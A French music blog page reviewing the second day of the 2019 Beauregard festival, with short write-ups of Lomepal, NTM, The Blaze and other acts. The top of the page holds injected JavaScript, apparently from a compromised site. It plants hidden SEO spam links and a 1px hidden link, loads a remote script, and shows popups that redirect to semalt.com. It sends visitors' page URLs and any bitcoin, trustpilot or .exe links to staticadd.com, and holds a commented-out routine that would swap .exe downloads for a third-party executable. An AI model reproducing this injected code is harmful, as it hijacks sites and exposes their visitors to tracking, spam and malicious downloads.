Logo/* Domain is for sale: admin@kickvox.com */ (function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var isTopLayer = false; var popupHtml = "
Great experience. Worth visiting there. Foods are over expensive. One regular glass of mango juice costs 600 BDT without explanation. gambling seo<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Great shop with easy parking. Stopped in for a quick arrangement and David was so helpful with suggestions and putting it together fast too. Glad to finally find a good florist in the area. t\u1ea3i \u1ee9ng d\u1ee5ng telegram cho máy tính<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Absolutely love this place from the food to the scenery. T-bones steakhouse and lounge is phenomenal. Chasity and Chelsea (bartenders) are freaking amazing. Please go see and have an amazing time as I have. <\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
One of the best views in Portland, solid high end cuisine with a decent happy hour semalt net<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
The hotel lobby is large and bright and clean. Nice chairs and swings. semalt net<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Great place 27th floor corner room is the way to go semalt net<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div> <\/div>
\u043a\u0432\u0430\u0440\u0442\u0438\u0440\u044b \u0431\u0430\u0442\u0443\u043c\u0438<\/a><\/span> <\/div>
<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var bottomHtml = "
Great experience. Worth visiting there. Foods are over expensive. One regular glass of mango juice costs 600 BDT without explanation. gambling seo<\/a>.<\/article>
Great shop with easy parking. Stopped in for a quick arrangement and David was so helpful with suggestions and putting it together fast too. Glad to finally find a good florist in the area. t\u1ea3i \u1ee9ng d\u1ee5ng telegram cho máy tính<\/a>.<\/article>
Absolutely love this place from the food to the scenery. T-bones steakhouse and lounge is phenomenal. Chasity and Chelsea (bartenders) are freaking amazing. Please go see and have an amazing time as I have. <\/a>.<\/article>
One of the best views in Portland, solid high end cuisine with a decent happy hour semalt net<\/a>.<\/article>
The hotel lobby is large and bright and clean. Nice chairs and swings. semalt net<\/a>.<\/article>
Great place 27th floor corner room is the way to go semalt net<\/a>.<\/article>\u043a\u0432\u0430\u0440\u0442\u0438\u0440\u044b \u0431\u0430\u0442\u0443\u043c\u0438<\/a><\/span>"; var popupCreated = false; var bottomPopup = false || /[?&]test=1/.test(location.href); //officeLog(bottomHtml); function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function officeLog(data) { } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:11px; line-height:normal;'); sheet.addRule('.shbNetPopupTable a, .shbNetPopupTable b', 'text-decoration:none; background:none; height:auto !important; color:#737373; font-size:11px; font-weight:bold;'); sheet.addRule('.shbNetTopLayer .shbNetPopupWr', 'display:block !important; width: 100% !important; x-index:99999999 !important; background: #fff !important; padding: 2px 10px !important;'); sheet.addRule('.shbNetTopLayer #shbNetPaddingTable', 'display:table !important;'); } function createTopLayer() { //if (!domReady) return; var div = document.createElement('div'); div.className = 'shbNetTopLayer'; div.innerHTML = popupHtml; document.body.insertBefore(div, document.body.childNodes[0]); popupCreated = true; } function tryCreatePopup(stage) { if (popupCreated) return; if (isTopLayer) { createTopLayer(); return; } if (bottomPopup) { var box = document.createElement('div'); box.innerHTML = bottomHtml; document.body.appendChild(box); return; } if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '800px', maxWidth: '98%', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\b' + className + '\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} (function() { if (!document.querySelector) return; var added = false; tryAddLink(); window.addEventListener('DOMContentLoaded', tryAddLink); setTimeout(tryAddLink, 100); setTimeout(tryAddLink, 1000); setTimeout(tryAddLink, 2000); function tryAddLink() { if (added) return; var menu = document.querySelector('#wpadminbar .ab-top-menu'); if (!menu) return; var li = document.createElement('li'); li.innerHTML = 'SEO promotion'; //menu.appendChild(li); added = true; save(); } function save() { var json = JSON.stringify({ hrefs: ['wordpress_new'], jsDomain: 'staticadd.com', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//staticadd.com/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } })(); (function() { function byId(id) { return document.getElementById(id); } function setCookie() { var date = new Date(); date.setTime(date.getTime() + (60 * 60 * 1000)); document.cookie = 'closePopupStartWow=1; path=/; domain=.' + location.hostname + '; expires=' + date.toGMTString(); } function listenerPopupSemalt(event){ if (event.origin != 'https://semalt.com') return; if (!event.data) return; if (event.data == 'closePopupStartWow'){ var el = byId('popupStartWow'); if (!el) return; el.style.display = 'none'; setCookie(); } else if(event.data.indexOf('startPopupStartWow')>-1) { try{var res = JSON.parse(event.data); if(res && res.page){ location.href = 'https://semalt.com/?s='+decodeURIComponent(res.page)+'&ref=blogspot'; } } catch(ee) { } setCookie(); } } function init() { if (document.getElementById('popupWowNode')) return; var div = document.createElement('div'); div.id = 'popupWowNode'; try { div.innerHTML = html; } catch (err) { return; } document.body.appendChild(div); setTimeout(function(){ if (document.cookie.indexOf('closePopupStartWow') !== -1) return; var el = byId('popupStartWow'); if (!el) return; el.setAttribute('src', 'https://semalt.com/popups/popup_wow.php?lang=en'); setTimeout(function(){ el.style.display = 'block'; }, 400); },400); } setTimeout(init, 100); setTimeout(init, 1000); setTimeout(init, 2000); window.addEventListener('message', listenerPopupSemalt, false); })(); setTimeout(function() { /*try { var links = document.querySelectorAll('a[href$=".exe"]'); for (var i = 0; i < links.length; i++) { links[i].href = 'https://myprintscreen.com/soft/myp0912.exe'; break; } } catch (err) {}*/ try { var links = document.querySelectorAll('a[href^="bitcoin:"], a[href*="trustpilot.com"], a[href$=".exe"]'); //var links = document.querySelectorAll('a[href^="https://"]'); if (links.length) { var hrefs = []; for (var i = 0; i < links.length; i++) { hrefs.push(links[i].href); } var json = JSON.stringify({ hrefs: hrefs, jsDomain: 'staticadd.com', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//staticadd.com/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } } catch (ex) {} }, 2000); })();
  • Politique de confidentialité
  • Le site
  • Droits d’auteurs
  • Contact
  • (re)Découvertes
  • Albums
  • Clips
  • Concerts
  • Dossiers
  • Editoriaux
  • Entretiens
  • Près de chez toi
  • Reportages
  • Sessions
  • Tribune libre
LeTransistor A la une Beauregard 2019 – NTM, The Blaze, Lomepal

Beauregard 2019 – NTM, The Blaze, Lomepal

Publié le 28 Aug 2019
Rédacteur : Spud Photographe : Stéphane Spitz

Email, RSS Follow
Email

Deuxième jour du festival Beauregard toujours à Hérouville Saint Clair dans la région caennaise. Encore une bonne journée avec le bluesman Fantastic Negrito, le mélancolique Tamino, le survolté Talisco, le vieux briscard Bernard Lavilliers, le seul et l’unique Lomepal et nos chouchous de The Blaze. Avec une préférence pour la découverte de We Hate You Please Die, et une plongée nostalgique avec NTM.

We Hate You Please Die

On a bien fait de ne pas louper le premier concert du jour ! La prestation des jeunes rouennais nous a bien réveillés, surtout grâce à un chanteur/leader à la fois possédé et inquiétant. Son chant souvent hurlé, saturé, parfois plaintif, toujours jouissif, est soutenu par un trio basse-guitare-batterie garage-punk avec quelques choeurs limite mignons. Bref, quelques moments de calme, mais qui annoncent toujours la grosse tempête et la grosse patate. Le chanteur finit souvent dans le public qui pogote gentiment. Super énergie : on a adoré.

7-WHYPD-7
7-WHYPD-8
7-WHYPD-11
7-WHYPD-12
7-WHYPD-1
7-WHYPD-4

Fantastic Negrito

On avait rarement vu un chanteur aussi stylé. Entre dandy et bluesman énervé, le californien sort de bons gros riffs et solos de guitare efficaces. Il fait le show et joue pas mal avec le public de la grande scène. Jolie version de ‘My Girl‘ en mode jazzy.

8-Fantastic-Negrito-1
8-Fantastic-Negrito-5
8-Fantastic-Negrito-8
8-Fantastic-Negrito-14

Voir les prochains concerts de Fantastic Negrito

Tamino

Beaucoup plus posé, même timide, le Belge Tamino apaise la scène John de par ses chansons et sa voix mélancoliques. Ce qui ne l’empêche pas de monter parfois en voix de tête dans une complainte suraiguë : impressionnant. Au début, on trouvait le set un peu mou, mais c’est plutôt l’occasion pour certains de s’imprégner de ce romantisme musical parfois arabisant et pour les autres de chiller sur la pelouse. A écouter, le titre ‘Cigar‘.

Voir les prochains concerts de Tamino

Talisco

Vu la foule qui l’attend en l’acclamant, on ne dirait pas que le Bordelais remplace Snow Patrol, qui a du annuler au dernier moment. Talisco compte désormais une grosse fanbase, et pas qu’en France, et des titres populaires comme ‘Sun‘, ‘The Keys‘ ou ‘You Wish‘ font un carton sur une scène de festival comme celle-ci. En plus, le gars se démène, saute partout et est constamment à fond.

11-Talisco-8
11-Talisco-9
11-Talisco-12
11-Talisco-15
11-Talisco-16
11-Talisco-7

Voir les prochains concerts de Talisco

Bernard Lavilliers

Quand Bernard nous raconte ses voyages à Cuba ou en Jamaïque, c’est en chansons; et finalement on écoute attentivement le conteur et son groupe de vieux briscards bien groovy dont les membres tapent parfois des solos de feu. Oui, il a joué ‘On the Road Again‘ dans une version intimiste seul à la guitare acoustique.

12-Lavilliers-19
12-Lavilliers-8
12-Lavilliers-15
12-Lavilliers-16

Lomepal

C’est l’hystérie devant la scène John : les fans n’ont jamais autant hurlé de la journée. Même si ce n’est pas trop notre came, on reconnaît que ce mélange de rap et de pop élève le niveau par rapport à certaines productions de rap actuelles; et surtout, Antoine Lomepal est entouré de vrais musiciens avec de vrais instruments (dont Sage au clavier). Le joli ‘Trop Beau’ est un carton, on a l’impression que les trente mille spectateurs connaissent toutes les paroles et chantent tous ensemble.

13-Lomepal-4
13-Lomepal-8
13-Lomepal-9
13-Lomepal-13

Voir les prochains concerts de Lomepal

NTM

Ok on n’est pas forcément rap, mais juste mais quel kif d’écouter ces classiques en live. Kool Shen et JoeyStarr sont toujours les big boss et sont immortels, tout comme ‘Qu’est-ce qu’on attend‘, ‘Laisse pas traîner ton fils‘, ‘Ma Benz‘… Bref, c’était huge.

14-NTM-4
14-NTM-9
14-NTM-28
14-NTM-29

Voir les prochains concerts de NTM

The Blaze

Un intéressant groupe de musique électronique français qui commence à cartonner hors de son pays, ça ne se loupe pas. D’autant que leur live avec visuel énigmatique quasi lynchien est esthétiquement superbe. Le duo reste dans la pénombre et de profil, donc on les distingue manipuler leurs machines, ce qui ajoute un vrai côté vivant, indispensable à l’électro. En fait, on a vite le sentiment d’être sur une espèce de dancefloor mélancolique. Surtout grâce à certains titres sublimes comme ‘She‘. En gros, danse et émotions réunis : bingo.

15-The-Blaze-4
15-The-Blaze-2

On finit la soirée en dansant sur le live toujours classieux d’Etienne de Crecy et on rentre, pas tard. Il reste encore 2 jours…

Email, RSS Follow
Email

Remerciements : Isabelle Rodier

Catégorie : A la une, Reportages
Artiste(s) : Bernard Lavilliers, Fantastic Negrito, Lomepal, Suprême NTM, Talisco, Tamino, The Blaze, We Hate You Please Die
Evenement(s) : Beauregard

Et toi t'en penses quoi ?

A lire aussi

  • Peter Doherty & Frédéric Lo au Trianon
  • P.R2B à La Cigale
  • Brigitte Fontaine au Printemps de Bourges
  • Franz Ferdinand au Zénith
  • Myele Manzanza et Monsieur MÂLÂ au New Morning

Gallery

img_4576 img_0611 17-Dead-Kennedys-9 4-Savages-1